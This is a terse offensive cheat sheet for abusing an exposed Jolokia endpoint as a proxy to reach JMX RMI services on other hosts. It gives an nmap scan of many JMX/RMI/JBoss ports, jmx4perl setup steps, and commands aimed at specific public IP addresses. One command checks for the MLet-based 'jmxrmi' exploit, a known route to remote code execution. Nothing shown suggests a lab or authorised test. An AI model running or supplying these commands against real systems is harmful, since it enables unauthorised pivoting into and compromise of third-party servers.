-
easy SSL/Proxy bypass with jolokia
-
Example: http://172.93.48.216:9000/jolokia/
- Nmap :
nmap --append-output -oX $HOME/Scans/nmap-new.xml --open -Pn -p 2010,8009,1098,4444,7001,99,1030,1035,1090,1098,1099,1100,1101,1102,1103,1129,1199,1234,1440,2199,2809,3273,3333,3900,5520,5521,5580,5999,6060,6789,6996,7700,7800,7801,7878,7890,8050,8051,8085,8091,8205,8303,8642,8686,8701,8889,8890,8901,8902,8903,8999,9001,9003,9004,9005,9050,9099,9300,9500,9711,9809,9810,9811,9812,9813,9814,9815,9875,9910,9991,10098,10099,10162,11001,11099,11333,12000,13013,14000,15000,15001,15200,16000,17200,18980,20000,23791,26256,31099,32913,33000,37718,45230,47001,47002,50050,50500,50501,50502,50503,50504 --version-all -sV --script='jdwp-info,rmi-*' -iL /tmp/jboss-good -v
cpanm install -n Term::ReadKey
cpanm PJB/Term-Clui-1.70.tar.gz
cpanm install \
JSON::XS \
Term::ReadLine::Gnu \
LWP::Protocol::https \
XML::LibXML
cpanm -nf JMX::Jmx4Perl
-
Easy with jolokia
jmx4perl 'http://172.93.48.216:9000/jolokia' --target service:jmx:rmi:///jndi/rmi://221.228.205.175:1099/jmxrmi list -
Check for "jmxrmi" exploit
jmx4perl 'http://172.93.48.216:9000/jolokia' --target service:jmx:rmi:///jndi/rmi://94.130.168.200:1099/jmxrmi list DefaultDomain:type=MLet
-
Some handy alias
alias jmx4perl="docker run --rm -it -v ~/.j4p:/root/.j4p jolokia/jmx4perl jmx4perl" alias jolokia="docker run --rm -it -v `pwd`:/jolokia jolokia/jmx4perl jolokia" alias j4psh="docker run --rm -it -v ~/.j4p:/root/.j4p jolokia/jmx4perl j4psh"